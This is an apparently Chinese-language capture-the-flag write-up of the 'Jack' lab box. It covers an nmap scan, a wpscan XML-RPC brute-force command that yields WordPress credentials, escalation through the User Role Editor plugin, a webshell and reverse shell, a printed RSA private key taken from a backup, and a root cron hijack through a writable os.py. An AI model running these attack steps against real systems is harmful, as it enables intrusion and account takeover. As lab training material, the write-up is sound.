Jack

端口扫描

root@ip-10-10-110-123:~/jack# nmap -sTCV -p 22,80 --min-rate 1000 10.10.50.190

Starting Nmap 7.60 ( https://nmap.org ) at 2023-10-29 06:46 GMT
Nmap scan report for ip-10-10-50-190.eu-west-1.compute.internal (10.10.50.190)
Host is up (0.00011s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 3e:79:78:08:93:31:d0:83:7f:e2:bc:b6:14:bf:5d:9b (RSA)
|   256 3a:67:9f:af:7e:66:fa:e3:f8:c7:54:49:63:38:a2:93 (ECDSA)
|_  256 8c:ef:55:b0:23:73:2c:14:09:45:22:ac:84:cb:40:d2 (EdDSA)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 5.3.2
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Jack's Personal Site – Blog for Jacks writing adven...
MAC Address: 02:AD:C0:81:8A:0B (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.43 seconds

80

根据端口扫描的结果我知道对应的 80 端口是一个 wordpress 服务, 接着我进行了一些收集:

• 用户名枚举 : wendy, Password: changelater
• 漏洞扫描, 可惜没有发现利用的途径

所以我进行了暴力破解这里开始使用了 rockyou.txt 但是一个小时还是没有反应, 论坛提示使用小字典

root@ip-10-10-110-123:~/jack# wpscan --password-attack xmlrpc -t 20 -U jack,wendy,danny -P /usr/share/wordlists/fasttrack.txt  --url http://jack.thm/
[SUCCESS] - wendy / changelater

使用此进行登陆之后发现是一个普通用户, 查看提示内容

根据提示进行查找我发现了一个权限提升的方法, 我们可以使用这个方法将用户 wendy 提升为网站管理员 [WordPress Plugin User Role Editor < 4.24 - Privilege Escalation](https://vk9-sec.com/wordpress-plugin-user-role-editor-4-24-privilege-esca lation/)之后上传 WebShell 获取权限 (这里通过上传插件的方式进行操作)

后渗透

www-data

访问我们上传的 WebShell 来获取 reverse shell

www-data —> jack

查看 jack 用户家目录在其中发现一段提示其告诉我们注意文件权限在上次备份时出现了差错, 我直接查看 /var/backups 发现其中泄露了 jack 用户的 SSH 私钥

(remote) www-data@jack:/var$ ls -al backups/
total 776
.....
-rwxrwxrwx  1 root root     1675 Jan 10  2020 id_rsa
-rw-------  1 root root     1626 Jan  9  2020 passwd.bak
-rw-------  1 root shadow    969 Jan  9  2020 shadow.bak
(remote) www-data@jack:/var/backups$ cat id_rsa 
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAxfBR9F9V5G2snv1Xaaxv3VHbFZ2VZRwGyU+ah6komBeaAldr
8SNK1x0wu/eXjLjrWnVaYOEU2YUrHzn/duB3Wvm8xyA0T8x/WbV2osWaVOafkPSv
YpV4OdQrdRoS3PEOXRnS+CnOTAgPWo2+xfH1XeldFw9XiYrprTugmwCcYDuBZB3r
zmWA8sPWjLjs6xzNK26RQQbo9zaxwfEdjZ3an9JngJJ7m0rtF9vKeCRfO1V8sd/t
1lu96Kqn4FZUTXQFEGfAYupG6b3vpRwqmI6y2VjK5MxlMmEdwP8oxmKR4XRqvSK1
8m5byz8ZUu1RfB8Ug/pKK9VVbk9QFWbrV4E3FwIDAQABAoIBAEEr0TAOu68MVUu7
yi4m8mYCb4n8apXx1mIt7YlBLvZ0vuaKdiXdIuUU3VjmOmXA9OzButIvCbhc2kfb
xrsTSPkRRRCjD9Y+VKfq0XbibOALVvpZNe3VnNIdg3l47kEEtV/+ArJmwV/TP4rn
JKrz8X/MODRBfubwb+Pzv/uJBfPAzvkokKUp9D2LqNjQEY4w71j0yUl+A0xnkT4i
L1FbzghdARExy2cJN0RfdDKhy/DfXos7+JHso3ZvXmSx0ivS+HyCblO25Kcmy4Vh
FZotNk+28iw6DKm1wrgAjj0sdLpB6jW9+M/kSQCovMijPM8h8JNPLNOJMFSKWBH8
m9US/XECgYEA+AW0bbMVoylAcWGold85Ileyuw/q3HwsDdRrO43uMZvQe8f5TRsd
Q9SvAEz9T46YErySq33jOPmsGLf02EEiyGggpBiuhi3FmtMa7440qGFig4Q5IVxn
QuSDUQvxN/uVE+TZxlRPTUeAFPcAI4DAUYbubAcJzvXeAsCPsKbQGw0CgYEAzE42
H8SUWiCMXBMotEUpn14pGcP4O+hei9j7P1Nupy/F63UtYPvXN4oi75YeLiInUXzU
S/r3+AxoNafMAy67oQhLKHXs+NOP5aEkVhNDhHFNpWutYPn9aLWUIx1tXbWsaecE
i7OCxjp0L5lDRVl3TLzXeZmtp0oSAPKNRYmgQbMCgYAvL0aoKA3RwKNV7rJX8OO5
uN1z4Q9ZavYmm2bbKaFLJs1+/whatvHWWbwBXqRCYmpkBiQRJB36VOV8vmKCUcIA
Rm8PSPLK7CJP1iGluXQjJIPNaXZE9oNeooKpBJCbie1On5ceuCNuHFAtrOAF4RS1
beol+yDOks/tzhyICvREcQKBgCHIiRClu/ZPTYZoMKHmkeRleJxnGGQnn4K2hY1K
KZEByFOQE8nmuwbXE8HUa/cq9J936c8Kl/hvbMf6kDSyhJozOeJd5aqbqT7Kb6zA
ELkU10cUUB4qGGo5JF7OHeiSAwmcBtdm/qfywIWibUpJaf3JeEQGUn3INMPtV8j4
4gQbAoGBAKuXPITKuO7SsRfXcwB3MO3iCTLdW7BYnYF1SzVbPBonmcsxlQinvoRg
2faWmSFAUK6cIys9za3pzOw3FP8W9Q5SGsA9KriSYj6/h7ei9GeJAr3mxlbGnkZN
ZFqUVe2Jvxq++O6Ub41zUtWINbR5Fxf+kTlJIIwqc6IuzZq+QWXy
-----END RSA PRIVATE KEY-----

使用此进行登陆我们就可以获取到 jack 用户的 Shell

jack —> root

接着我发现在 /opt 下存在一个属于 root 的脚本, 从其内容不难推断出, 这是一个定时任务, 我们只需要修改 os.py 文件就可以完成提权操作

(remote) www-data@jack:/opt/statuscheck$ ls -al
total 28
drwxr-xr-x 2 root root  4096 Jan 10  2020 .
drwxr-xr-x 3 root root  4096 Jan 10  2020 ..
-rw-r--r-- 1 root root    92 Jan 10  2020 checker.py
-rw-r--r-- 1 root root 13068 Oct 29 02:36 output.log
(remote) www-data@jack:/opt/statuscheck$ cat checker.py 
import os

os.system("/usr/bin/curl -s -I http://127.0.0.1 >> /opt/statuscheck/output.log")
(remote) www-data@jack:/opt/statuscheck$ head -n 5 output.log  
HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 00:44:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

之后查找所有的 os.py 文件, 发现其中一条我们可以进行写入这里就是我们的突破口了, 所以我在其中写入了一点内容,当脚本执行后我们就可以完成提权操作